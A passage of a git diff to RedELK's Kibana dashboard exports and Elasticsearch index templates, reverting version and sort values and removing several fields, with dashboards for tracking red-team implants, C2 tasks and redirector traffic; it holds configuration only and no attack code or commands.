"visualization": "7.14.0" @@ -4099,8 +4099,8 @@ } ], "sort": [ - 1642171875895, - 179 + 1642152856829, + 2289 ], "type": "visualization", "version": "1" @@ -4194,7 +4194,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "d625ba60-efe8-11eb-8a9f-2572da287875", "migrationVersion": { "visualization": "7.14.0" @@ -4207,8 +4207,8 @@ } ], "sort": [ - 1642171875895, - 181 + 1642152856829, + 2291 ], "type": "visualization", "version": "1" @@ -4273,7 +4273,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "dcf86190-d319-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -4286,8 +4286,8 @@ } ], "sort": [ - 1642171875895, - 183 + 1642152856829, + 2293 ], "type": "visualization", "version": "1" @@ -4417,7 +4417,7 @@ "type": "line" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -4430,8 +4430,8 @@ } ], "sort": [ - 1642171875895, - 185 + 1642152856829, + 2295 ], "type": "visualization", "version": "1" @@ -4522,7 +4522,7 @@ "type": "tile_map" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "e97f6f10-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -4535,8 +4535,8 @@ } ], "sort": [ - 1642171875895, - 187 + 1642152856829, + 2297 ], "type": "visualization", "version": "1" @@ -4714,7 +4714,7 @@ "type": "horizontal_bar" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -4732,8 +4732,8 @@ } ], "sort": [ - 1642171875895, - 190 + 1642152856829, + 2300 ], "type": "visualization", "version": "1" @@ -4890,7 +4890,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -4903,8 +4903,8 @@ } ], "sort": [ - 1642171875895, - 192 + 1642152856829, + 2302 ], "type": "visualization", "version": "1" @@ -4966,7 +4966,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -4979,8 +4979,8 @@ } ], "sort": [ - 1642171875895, - 194 + 1642152856829, + 2304 ], "type": "visualization", "version": "1" @@ -5042,7 +5042,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -5055,8 +5055,8 @@ } ], "sort": [ - 1642171875895, - 196 + 1642152856829, + 2306 ], "type": "visualization", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_bluecheck.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_bluecheck.json index 9ff9b079..668a1be1 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_bluecheck.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_bluecheck.json @@ -7,49 +7,6 @@ "_meta": {}, "_source": {}, "properties": { - "bluecheck": { - "properties": { - "accountname": { - "type": "text" - }, - "accountstate": { - "type": "text" - }, - "certissuer": { - "type": "text" - }, - "certsubject": { - "type": "text" - }, - "message": { - "type": "text" - }, - "pwchangedate": { - "type": "date" - }, - "sectools": { - "properties": { - "ProcessID": { - "type": "text" - }, - "Product": { - "type": "text" - }, - "Vendor": { - "type": "text" - } - }, - "type": "nested" - }, - "sectoolsamount": { - "type": "integer" - }, - "uri": { - "type": "text" - } - }, - "type": "object" - }, "bluechecktimestamp": { "type": "text" }, @@ -150,5 +107,5 @@ }, "order": 0, "settings": {}, - "version": 3 + "version": 1 } \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_redirtraffic.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_redirtraffic.json index d48ab86f..a40920c4 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_redirtraffic.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_redirtraffic.json @@ -64,27 +64,6 @@ }, "alarm": { "properties": { - "alarm_httptraffic": { - "properties": { - "last_alarmed": { - "doc_values": true, - "ignore_malformed": false, - "index": true, - "store": false, - "type": "date_nanos" - }, - "last_checked": { - "type": "date_nanos" - } - }, - "type": "object" - }, - "last_alarmed": { - "type": "date_nanos" - }, - "last_checked": { - "type": "date_nanos" - }, "timestamp": { "type": "date" } @@ -725,9 +704,6 @@ "ip": { "type": "ip" }, - "ip_otherproxies": { - "type": "keyword" - }, "port": { "type": "long" } diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_dashboard.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_dashboard.ndjson index a14964ad..d3ea8c37 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_dashboard.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_dashboard.ndjson @@ -1,12 +1,12 @@ -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"93f74516-7d73-4db3-8d64-589dfd7492b7\"},\"panelIndex\":\"93f74516-7d73-4db3-8d64-589dfd7492b7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_93f74516-7d73-4db3-8d64-589dfd7492b7\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":48,\"h\":2,\"i\":\"66e33663-63c3-4e78-aa5d-725e33754c02\"},\"panelIndex\":\"66e33663-63c3-4e78-aa5d-725e33754c02\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_66e33663-63c3-4e78-aa5d-725e33754c02\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":8,\"h\":9,\"i\":\"800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\"},\"panelIndex\":\"800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":8,\"y\":4,\"w\":8,\"h\":9,\"i\":\"86117a55-669e-4d4d-a4d6-436da4f1a930\"},\"panelIndex\":\"86117a55-669e-4d4d-a4d6-436da4f1a930\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_86117a55-669e-4d4d-a4d6-436da4f1a930\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":16,\"y\":4,\"w\":8,\"h\":9,\"i\":\"ab07bed8-9d4e-409c-b3db-d15124eb5467\"},\"panelIndex\":\"ab07bed8-9d4e-409c-b3db-d15124eb5467\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_ab07bed8-9d4e-409c-b3db-d15124eb5467\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":4,\"w\":8,\"h\":9,\"i\":\"019655aa-c9de-444a-a4af-619b7297572b\"},\"panelIndex\":\"019655aa-c9de-444a-a4af-619b7297572b\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_019655aa-c9de-444a-a4af-619b7297572b\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":32,\"y\":4,\"w\":16,\"h\":9,\"i\":\"43a0761e-49bc-4846-9956-04a604b063ec\"},\"panelIndex\":\"43a0761e-49bc-4846-9956-04a604b063ec\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_43a0761e-49bc-4846-9956-04a604b063ec\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":13,\"w\":8,\"h\":9,\"i\":\"eab2038d-128a-4b5b-8a72-701fd3f53bd8\"},\"panelIndex\":\"eab2038d-128a-4b5b-8a72-701fd3f53bd8\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":8,\"y\":13,\"w\":8,\"h\":9,\"i\":\"e18544fe-ac30-43cf-891c-4448ffea6bbd\"},\"panelIndex\":\"e18544fe-ac30-43cf-891c-4448ffea6bbd\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_e18544fe-ac30-43cf-891c-4448ffea6bbd\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":16,\"y\":13,\"w\":16,\"h\":9,\"i\":\"6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\"},\"panelIndex\":\"6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Compromised realms\",\"panelRefName\":\"panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":32,\"y\":13,\"w\":8,\"h\":9,\"i\":\"223951c1-7fe0-40f9-9a89-0c91aedd7fce\"},\"panelIndex\":\"223951c1-7fe0-40f9-9a89-0c91aedd7fce\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":40,\"y\":13,\"w\":8,\"h\":9,\"i\":\"c15dc2cd-fad3-44a3-b127-1cd47d837740\"},\"panelIndex\":\"c15dc2cd-fad3-44a3-b127-1cd47d837740\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_c15dc2cd-fad3-44a3-b127-1cd47d837740\"}]", "refreshInterval": {"pause": true, "value": 0}, "timeFrom": "now-12M", "timeRestore": true, "timeTo": "now", "title": "RedELK - Summary dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "02486040-d355-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "93f74516-7d73-4db3-8d64-589dfd7492b7:panel_93f74516-7d73-4db3-8d64-589dfd7492b7", "type": "visualization"}, {"id": "45491770-0886-11eb-a2d2-171dc8941414", "name": "66e33663-63c3-4e78-aa5d-725e33754c02:panel_66e33663-63c3-4e78-aa5d-725e33754c02", "type": "visualization"}, {"id": "b19d4790-d35f-11ea-9301-a30a04251ae9", "name": "800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3:panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", "type": "visualization"}, {"id": "dcf86190-d319-11ea-9301-a30a04251ae9", "name": "86117a55-669e-4d4d-a4d6-436da4f1a930:panel_86117a55-669e-4d4d-a4d6-436da4f1a930", "type": "visualization"}, {"id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "name": "ab07bed8-9d4e-409c-b3db-d15124eb5467:panel_ab07bed8-9d4e-409c-b3db-d15124eb5467", "type": "visualization"}, {"id": "389dddc0-d317-11ea-9301-a30a04251ae9", "name": "019655aa-c9de-444a-a4af-619b7297572b:panel_019655aa-c9de-444a-a4af-619b7297572b", "type": "visualization"}, {"id": "ce581930-d361-11ea-9301-a30a04251ae9", "name": "43a0761e-49bc-4846-9956-04a604b063ec:panel_43a0761e-49bc-4846-9956-04a604b063ec", "type": "visualization"}, {"id": "57626ad0-d355-11ea-9301-a30a04251ae9", "name": "eab2038d-128a-4b5b-8a72-701fd3f53bd8:panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8", "type": "visualization"}, {"id": "464660c0-d360-11ea-9301-a30a04251ae9", "name": "e18544fe-ac30-43cf-891c-4448ffea6bbd:panel_e18544fe-ac30-43cf-891c-4448ffea6bbd", "type": "visualization"}, {"id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "name": "6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d:panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", "type": "visualization"}, {"id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "name": "223951c1-7fe0-40f9-9a89-0c91aedd7fce:panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce", "type": "visualization"}, {"id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "name": "c15dc2cd-fad3-44a3-b127-1cd47d837740:panel_c15dc2cd-fad3-44a3-b127-1cd47d837740", "type": "visualization"}], "sort": [1642171876916, 34], "type": "dashboard", "version": "1"} -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"9af964d0-b9c5-4fa0-81d7-6e7cf9657757\"},\"panelIndex\":\"9af964d0-b9c5-4fa0-81d7-6e7cf9657757\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":6,\"i\":\"09cb7bd6-8162-4141-8a0c-807ee57a4603\"},\"panelIndex\":\"09cb7bd6-8162-4141-8a0c-807ee57a4603\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Target host(s) and user(s) filter\",\"panelRefName\":\"panel_09cb7bd6-8162-4141-8a0c-807ee57a4603\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":12,\"h\":6,\"i\":\"fcd3a5bc-91d9-46a2-b08c-92958c5b6089\"},\"panelIndex\":\"fcd3a5bc-91d9-46a2-b08c-92958c5b6089\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Implants per host\",\"panelRefName\":\"panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":36,\"y\":2,\"w\":12,\"h\":6,\"i\":\"47710d04-18f9-4563-bf0d-73b4dc24f9e5\"},\"panelIndex\":\"47710d04-18f9-4563-bf0d-73b4dc24f9e5\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Implants per user\",\"panelRefName\":\"panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":8,\"w\":48,\"h\":51,\"i\":\"30674424-d470-4b93-80c1-260d16f987ab\"},\"panelIndex\":\"30674424-d470-4b93-80c1-260d16f987ab\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_30674424-d470-4b93-80c1-260d16f987ab\"}]", "timeRestore": false, "title": "RedELK - Red Team Operations", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "04b87c50-d028-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "9af964d0-b9c5-4fa0-81d7-6e7cf9657757:panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757", "type": "visualization"}, {"id": "d2c7b720-d026-11ea-9301-a30a04251ae9", "name": "09cb7bd6-8162-4141-8a0c-807ee57a4603:panel_09cb7bd6-8162-4141-8a0c-807ee57a4603", "type": "visualization"}, {"id": "632081a0-d02a-11ea-9301-a30a04251ae9", "name": "fcd3a5bc-91d9-46a2-b08c-92958c5b6089:panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089", "type": "visualization"}, {"id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "name": "47710d04-18f9-4563-bf0d-73b4dc24f9e5:panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5", "type": "visualization"}, {"id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "name": "30674424-d470-4b93-80c1-260d16f987ab:panel_30674424-d470-4b93-80c1-260d16f987ab", "type": "search"}], "sort": [1642171876916, 40], "type": "dashboard", "version": "1"} -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\"},\"panelIndex\":\"8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":9,\"i\":\"ecf77ead-e22f-4708-addf-0cbaaeb6fced\"},\"panelIndex\":\"ecf77ead-e22f-4708-addf-0cbaaeb6fced\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Techniques, Tactics and Procedures\",\"panelRefName\":\"panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":24,\"h\":18,\"i\":\"ff3f84bc-6c84-43fd-aa0f-19e5a91be826\"},\"panelIndex\":\"ff3f84bc-6c84-43fd-aa0f-19e5a91be826\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"C2 tasks per host and user\",\"panelRefName\":\"panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":11,\"w\":24,\"h\":9,\"i\":\"23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\"},\"panelIndex\":\"23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Cobalt Strike tasks per operator\",\"panelRefName\":\"panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":20,\"w\":48,\"h\":14,\"i\":\"b038a84c-9db0-4266-af43-c8023da4781a\"},\"panelIndex\":\"b038a84c-9db0-4266-af43-c8023da4781a\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"C2 tasks\",\"panelRefName\":\"panel_b038a84c-9db0-4266-af43-c8023da4781a\"}]", "timeRestore": false, "title": "RedELK - Tasks", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "0523c8a0-d025-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "8f1a6a90-4b7e-47ef-aa74-a6037b7461e1:panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1", "type": "visualization"}, {"id": "88db1280-d024-11ea-9301-a30a04251ae9", "name": "ecf77ead-e22f-4708-addf-0cbaaeb6fced:panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced", "type": "visualization"}, {"id": "a5554e20-d025-11ea-9301-a30a04251ae9", "name": "ff3f84bc-6c84-43fd-aa0f-19e5a91be826:panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826", "type": "visualization"}, {"id": "afb6ce00-d022-11ea-9301-a30a04251ae9", "name": "23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e:panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e", "type": "visualization"}, {"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "b038a84c-9db0-4266-af43-c8023da4781a:panel_b038a84c-9db0-4266-af43-c8023da4781a", "type": "search"}], "sort": [1642171876916, 46], "type": "dashboard", "version": "1"} -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":true,\"key\":\"tags\",\"negate\":false,\"params\":{\"query\":\"iplist_redteam\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"iplist_redteam\"}}},{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":true,\"key\":\"tags\",\"negate\":false,\"params\":{\"query\":\"iplist_customer\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"iplist_customer\"}}}]}"}, "optionsJSON": "{\"darkTheme\":false,\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":4,\"i\":\"948c1286-d4de-44a6-8fb2-95bf9252ed00\"},\"panelIndex\":\"948c1286-d4de-44a6-8fb2-95bf9252ed00\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_948c1286-d4de-44a6-8fb2-95bf9252ed00\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":36,\"h\":5,\"i\":\"ab9eb0fb-a164-4295-8177-865a2a67dccb\"},\"panelIndex\":\"ab9eb0fb-a164-4295-8177-865a2a67dccb\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"Filters\",\"panelRefName\":\"panel_ab9eb0fb-a164-4295-8177-865a2a67dccb\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":36,\"y\":4,\"w\":12,\"h\":5,\"i\":\"c630a33e-6a98-466d-8223-fd83e6947b8c\"},\"panelIndex\":\"c630a33e-6a98-466d-8223-fd83e6947b8c\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{},\"vis\":{\"legendOpen\":true}},\"title\":\"HTTP Redir traffic per backend\",\"panelRefName\":\"panel_c630a33e-6a98-466d-8223-fd83e6947b8c\"},{\"version\":\"7.16.3\",\"type\":\"map\",\"gridData\":{\"x\":0,\"y\":9,\"w\":24,\"h\":15,\"i\":\"1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\"},\"panelIndex\":\"1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\",\"embeddableConfig\":{\"hiddenLayers\":[],\"hidePanelTitles\":false,\"isLayerTOCOpen\":false,\"mapCenter\":{\"lat\":14.5701,\"lon\":121.0254,\"zoom\":17},\"openTOCDetails\":[],\"enhancements\":{}},\"title\":\"HTTP redir traffic map\",\"panelRefName\":\"panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":9,\"w\":24,\"h\":15,\"i\":\"fc254327-57ac-4e5f-88f7-a32d48570289\"},\"panelIndex\":\"fc254327-57ac-4e5f-88f7-a32d48570289\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"HTTP Redir traffic over time\",\"panelRefName\":\"panel_fc254327-57ac-4e5f-88f7-a32d48570289\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":24,\"w\":24,\"h\":15,\"i\":\"829f61cf-9374-4bb5-8214-34e6875e79da\"},\"panelIndex\":\"829f61cf-9374-4bb5-8214-34e6875e79da\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_829f61cf-9374-4bb5-8214-34e6875e79da\"},{\"version\":\"7.16.3\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":39,\"w\":48,\"h\":22,\"i\":\"0bc5f60b-f940-451a-886b-edff3512d180\"},\"panelIndex\":\"0bc5f60b-f940-451a-886b-edff3512d180\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_0bc5f60b-f940-451a-886b-edff3512d180\"}]", "refreshInterval": {"pause": false, "value": 30000}, "timeFrom": "now-1d", "timeRestore": true, "timeTo": "now", "title": "RedELK - Traffic dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "948c1286-d4de-44a6-8fb2-95bf9252ed00:panel_948c1286-d4de-44a6-8fb2-95bf9252ed00", "type": "visualization"}, {"id": "56350050-efe7-11eb-8a9f-2572da287875", "name": "ab9eb0fb-a164-4295-8177-865a2a67dccb:panel_ab9eb0fb-a164-4295-8177-865a2a67dccb", "type": "visualization"}, {"id": "d625ba60-efe8-11eb-8a9f-2572da287875", "name": "c630a33e-6a98-466d-8223-fd83e6947b8c:panel_c630a33e-6a98-466d-8223-fd83e6947b8c", "type": "visualization"}, {"id": "dd9e9510-efec-11eb-8a9f-2572da287875", "name": "1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a:panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", "type": "map"}, {"id": "be08d380-efe9-11eb-8a9f-2572da287875", "name": "fc254327-57ac-4e5f-88f7-a32d48570289:panel_fc254327-57ac-4e5f-88f7-a32d48570289", "type": "visualization"}, {"id": "cbb7d710-efee-11eb-8a9f-2572da287875", "name": "829f61cf-9374-4bb5-8214-34e6875e79da:panel_829f61cf-9374-4bb5-8214-34e6875e79da", "type": "visualization"}, {"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "0bc5f60b-f940-451a-886b-edff3512d180:panel_0bc5f60b-f940-451a-886b-edff3512d180", "type": "search"}], "sort": [1643016059071, 291], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK implants dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"tags\",\"params\":{\"query\":\"sandboxes_v01\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"sandboxes_v01\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"tags\",\"params\":{\"query\":\"testsystems_v01\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"testsystems_v01\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "optionsJSON": "{\"darkTheme\":false,\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":15,\"i\":\"1\"},\"panelIndex\":\"1\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":24,\"h\":15,\"i\":\"2\"},\"panelIndex\":\"2\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_2\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":17,\"w\":24,\"h\":15,\"i\":\"3\"},\"panelIndex\":\"3\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_3\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":32,\"w\":48,\"h\":22,\"i\":\"4\"},\"panelIndex\":\"4\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_4\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":17,\"w\":24,\"h\":15,\"i\":\"5\"},\"panelIndex\":\"5\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_5\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\